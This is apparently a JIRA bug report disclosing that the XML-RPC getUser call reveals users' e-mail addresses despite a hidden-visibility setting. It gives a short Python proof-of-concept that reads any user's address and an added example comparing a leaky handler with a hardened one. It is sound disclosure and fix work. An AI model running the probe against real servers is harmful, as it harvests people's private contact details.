XMLRPC information security leak


    • Type: Bug
    • Resolution: Fixed
    • Priority: High
    • Fix Version/s: 4.1
    • Affects Version/s: 3.13.4
    • Component/s: None
    • Environment: CentOS 5.3 i386, JDK 1.6.0u16, standalone (in WANdisco JIRA multisite)

    • 3.13

      Server is set in public mode. The configuration option for email is set to hidden.
      The XMLRPC interface is enabled for authenticated users.

      It is trivial to find a user's email.

      Proof-of-concept Python code follows:

      #!/usr/bin/env python3
      # Proof of concept: read any user's e-mail over the XML-RPC interface,
      # even though the "User email visibility" option is set to hidden.
      import sys
      import xmlrpc.client

      s = xmlrpc.client.ServerProxy('http://myhostname.fqdn/rpc/xmlrpc')
      auth = s.jira1.login('username', 'password')   # any ordinary authenticated account

      user = s.jira1.getUser(auth, sys.argv[1])      # target username from the command line
      print("Email address of " + sys.argv[1] + " is " + user['email'])

      Attachments:
        1. xmlrpc_email.zip (1 kB)
        2. RemoteUser.java.patch (0.4 kB)
        3. RemoteConfiguration.java.patch (1 kB)
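The issue above is that the XML-RPC `getUser` method hands back the user record without consulting the e-mail visibility setting that the web UI honours. The following is an added example, not code from the report, from the attached patches or from JIRA itself: it models a `jira1.getUser` handler that leaks the address beside a hardened one that applies the visibility policy server-side before the record leaves the RPC layer, and runs the reporter's probe against both over a local XML-RPC server. The user directory, the password, the visibility option names and the function names are assumptions for illustration.

```python
"""Added example, not part of the original issue or of JIRA's RemoteUser code.

Shows an XML-RPC getUser handler that leaks e-mail regardless of the
"email visibility" setting, beside a hardened handler that applies the
setting before returning the record. All names and data are assumptions.
"""
import threading
import xmlrpc.client
from xmlrpc.server import SimpleXMLRPCServer

# Constructed sample user directory (not real data).
USERS = {
    "alice": {"name": "alice", "fullname": "Alice Example", "email": "alice@example.org"},
    "bob": {"name": "bob", "fullname": "Bob Example", "email": "bob@example.org"},
}

# Assumed visibility options: public, hidden, masked, logged-in users only.
SHOW, HIDE, MASK, LOGGED_IN = "show", "hide", "mask", "user"


def mask_email(addr):
    """'alice@example.org' -> 'alice at example dot org' (assumed masking style)."""
    return addr.replace("@", " at ").replace(".", " dot ")


def vulnerable_get_user(token, username, email_visibility):
    """Leaky variant: returns the raw record; the visibility setting is never read."""
    user = USERS.get(username)
    if user is None:
        raise ValueError("no such user")
    return dict(user)


def hardened_get_user(token, username, email_visibility):
    """Hardened variant: applies the same policy the web UI enforces.

    The key is kept (empty when hidden) so existing RPC clients that index
    the struct keep working; only the data is withheld.
    """
    user = USERS.get(username)
    if user is None:
        raise ValueError("no such user")
    view = {"name": user["name"], "fullname": user["fullname"], "email": ""}
    authenticated = token is not None
    if email_visibility == SHOW or (email_visibility == LOGGED_IN and authenticated):
        view["email"] = user["email"]
    elif email_visibility == MASK:
        view["email"] = mask_email(user["email"])
    return view


def serve(handler, email_visibility, port=0):
    """Exposes `handler` as jira1.getUser on localhost; returns (server, url)."""
    srv = SimpleXMLRPCServer(("127.0.0.1", port), logRequests=False, allow_none=True)
    sessions = {}

    def login(username, password):
        # Toy authentication for the demo: any known user with password "secret".
        if username in USERS and password == "secret":
            token = "tok-" + username
            sessions[token] = username
            return token
        raise ValueError("bad credentials")

    def get_user(token, username):
        if token not in sessions:
            raise ValueError("not logged in")
        return handler(token, username, email_visibility)

    srv.register_function(login, "jira1.login")
    srv.register_function(get_user, "jira1.getUser")
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d/" % srv.server_address[1]


def fetch_email(url, username, password, target):
    """The reporter's probe: log in as any user, then read target's e-mail."""
    s = xmlrpc.client.ServerProxy(url)
    auth = s.jira1.login(username, password)
    return s.jira1.getUser(auth, target).get("email", "")


if __name__ == "__main__":
    # Run the probe against both handlers with e-mail visibility set to hidden.
    for label, handler in (("vulnerable", vulnerable_get_user), ("hardened", hardened_get_user)):
        srv, url = serve(handler, HIDE)
        print(label, "getUser with email hidden ->", repr(fetch_email(url, "bob", "secret", "alice")))
        srv.shutdown()
        srv.server_close()
```

Run it directly and the leaky handler returns `alice@example.org` to an unrelated logged-in user while the hardened one returns an empty string. The point to take from it is that the visibility check belongs in the code that builds the remote user record, not in the web templates, so that every interface (web, XML-RPC, SOAP) sees the same policy.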

              Assignee: Michael Tokar
              Reporter: Mark Keir
              Votes: 0
              Watchers: 1
